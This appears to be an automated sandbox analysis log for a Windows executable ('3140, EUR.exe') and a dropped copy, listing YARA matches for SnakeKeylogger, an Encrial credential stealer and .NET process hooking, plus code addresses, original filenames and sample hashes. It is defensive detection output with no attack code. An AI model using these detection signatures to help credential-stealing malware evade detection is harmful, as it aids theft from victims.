Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: 3140, EUR.exe PID: 6844, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7276, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_07644608	0_2_07644608
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_076436D0	0_2_076436D0
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_07640040	0_2_07640040
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_07640F28	0_2_07640F28
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_07647918	0_2_07647918
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_0764E750	0_2_0764E750
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_076436C0	0_2_076436C0
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_076445F9	0_2_076445F9
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_076434C0	0_2_076434C0
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_076434B1	0_2_076434B1
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_07645378	0_2_07645378
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_07645331	0_2_07645331
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_07645388	0_2_07645388
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_07643260	0_2_07643260
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_07643250	0_2_07643250
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_0764C168	0_2_0764C168
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_0764001E	0_2_0764001E
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_076430C0	0_2_076430C0
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_076430B0	0_2_076430B0
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_07640F17	0_2_07640F17
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_07641E40	0_2_07641E40
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_07643E40	0_2_07643E40
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_07644E40	0_2_07644E40
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_07641E50	0_2_07641E50
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_07643E50	0_2_07643E50
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_07644E50	0_2_07644E50
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_07643EFB	0_2_07643EFB
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_0764BD30	0_2_0764BD30
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_0764DDA0	0_2_0764DDA0
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_07641C40	0_2_07641C40
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_07641C50	0_2_07641C50
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_07642A20	0_2_07642A20
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_07642A11	0_2_07642A11
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_0764D968	0_2_0764D968
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_0764D958	0_2_0764D958
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_07643928	0_2_07643928
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_07647908	0_2_07647908
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_07643918	0_2_07643918
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_0785E0E0	0_2_0785E0E0
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_0785C468	0_2_0785C468
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_0785C478	0_2_0785C478
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_0785E0C0	0_2_0785E0C0
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_0785D0C9	0_2_0785D0C9
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_0785D0D8	0_2_0785D0D8
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_07854D00	0_2_07854D00
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_07854CF0	0_2_07854CF0
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_0785E838	0_2_0785E838
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 0_2_0785E848	0_2_0785E848
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 8_2_02E1D278	8_2_02E1D278
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 8_2_02E15362	8_2_02E15362
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 8_2_02E1A088	8_2_02E1A088
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 8_2_02E1C147	8_2_02E1C147
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 8_2_02E17118	8_2_02E17118
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 8_2_02E1C738	8_2_02E1C738
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 8_2_02E1C468	8_2_02E1C468
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 8_2_02E1CA08	8_2_02E1CA08
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 8_2_02E169A0	8_2_02E169A0
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 8_2_02E1E988	8_2_02E1E988
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 8_2_02E1CFA9	8_2_02E1CFA9
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 8_2_02E1CCD8	8_2_02E1CCD8
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 8_2_02E1F979	8_2_02E1F979
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 8_2_02E1E97A	8_2_02E1E97A
Source: C:\Users\user\Desktop\3140, EUR.exe	Code function: 8_2_02E13E09	8_2_02E13E09
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_04FF0040	9_2_04FF0040
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_04FF001C	9_2_04FF001C
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_04FF3377	9_2_04FF3377
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_07634608	9_2_07634608
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_076336D0	9_2_076336D0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_07630040	9_2_07630040
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_07630F28	9_2_07630F28
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_0763E750	9_2_0763E750
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_076336C0	9_2_076336C0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_076345F9	9_2_076345F9
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_076334C0	9_2_076334C0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_076334B1	9_2_076334B1
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_07635378	9_2_07635378
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_07635331	9_2_07635331
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_07635388	9_2_07635388
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_07633260	9_2_07633260
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_07633250	9_2_07633250
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_0763C168	9_2_0763C168
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_07630007	9_2_07630007
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_076330C0	9_2_076330C0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_076330B0	9_2_076330B0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_07630F17	9_2_07630F17
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_07631E40	9_2_07631E40
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_07633E40	9_2_07633E40
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_07634E40	9_2_07634E40
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_07631E50	9_2_07631E50
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_07633E50	9_2_07633E50
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_07634E50	9_2_07634E50
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_07633EFB	9_2_07633EFB
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_0763BD30	9_2_0763BD30
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_0763BD19	9_2_0763BD19
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_0763DDA0	9_2_0763DDA0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_07631C40	9_2_07631C40
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_07631C50	9_2_07631C50
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_07632A20	9_2_07632A20
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_07632A11	9_2_07632A11
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_0763D967	9_2_0763D967
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_0763D968	9_2_0763D968
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_07633928	9_2_07633928
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 9_2_07633918	9_2_07633918
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_016EC2E9	15_2_016EC2E9
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_016E27B4	15_2_016E27B4
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_056EC46C	15_2_056EC46C
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_056EC738	15_2_056EC738
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_056EC147	15_2_056EC147
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_056E7118	15_2_056E7118
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_056EA088	15_2_056EA088
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_056E5362	15_2_056E5362
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_056ED278	15_2_056ED278
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_056ECCD8	15_2_056ECCD8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_056ECFAB	15_2_056ECFAB
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_056E69A0	15_2_056E69A0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_056EE988	15_2_056EE988
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_056ECA08	15_2_056ECA08
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_056E3E09	15_2_056E3E09
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_056EE97B	15_2_056EE97B
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_056EF979	15_2_056EF979
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_056E29EC	15_2_056E29EC
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_056E3AA1	15_2_056E3AA1
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F21E80	15_2_06F21E80
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F217A0	15_2_06F217A0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F20B30	15_2_06F20B30
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F29C70	15_2_06F29C70
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F2FC68	15_2_06F2FC68
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F25028	15_2_06F25028
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F22968	15_2_06F22968
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F29548	15_2_06F29548
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F2E6B0	15_2_06F2E6B0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F2E6AF	15_2_06F2E6AF
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F21E70	15_2_06F21E70
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F2E258	15_2_06F2E258
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F2E249	15_2_06F2E249
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F2DE00	15_2_06F2DE00
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F29BFA	15_2_06F29BFA
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F2F3B8	15_2_06F2F3B8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F28BA0	15_2_06F28BA0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F2F3A8	15_2_06F2F3A8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F28B91	15_2_06F28B91
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F2178F	15_2_06F2178F
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F2EF60	15_2_06F2EF60
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F2EF51	15_2_06F2EF51
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F20B20	15_2_06F20B20
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F29328	15_2_06F29328
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F2EB08	15_2_06F2EB08
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F2D0F8	15_2_06F2D0F8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F2CCA0	15_2_06F2CCA0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F2CC8F	15_2_06F2CC8F
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F20040	15_2_06F20040
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F2F810	15_2_06F2F810
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F25018	15_2_06F25018
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F2F801	15_2_06F2F801
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F20006	15_2_06F20006
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F2DDFF	15_2_06F2DDFF
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F2D9A8	15_2_06F2D9A8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F2D999	15_2_06F2D999
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F2D550	15_2_06F2D550
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Code function: 15_2_06F2D545	15_2_06F2D545

Source: 3140, EUR.exe, 00000000.00000000.1656247053.0000000000402000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameOqNV.exe> vs 3140, EUR.exe
Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs 3140, EUR.exe
Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs 3140, EUR.exe
Source: 3140, EUR.exe, 00000000.00000002.1724176185.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 3140, EUR.exe
Source: 3140, EUR.exe, 00000000.00000002.1743280560.0000000009FD0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs 3140, EUR.exe
Source: 3140, EUR.exe, 00000000.00000002.1740034846.000000000741E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameOqNV.exe> vs 3140, EUR.exe
Source: 3140, EUR.exe, 00000000.00000002.1727021709.0000000002AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs 3140, EUR.exe
Source: 3140, EUR.exe, 00000008.00000002.4120197349.0000000001177000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs 3140, EUR.exe
Source: 3140, EUR.exe	Binary or memory string: OriginalFilenameOqNV.exe> vs 3140, EUR.exe

Source: 3140, EUR.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
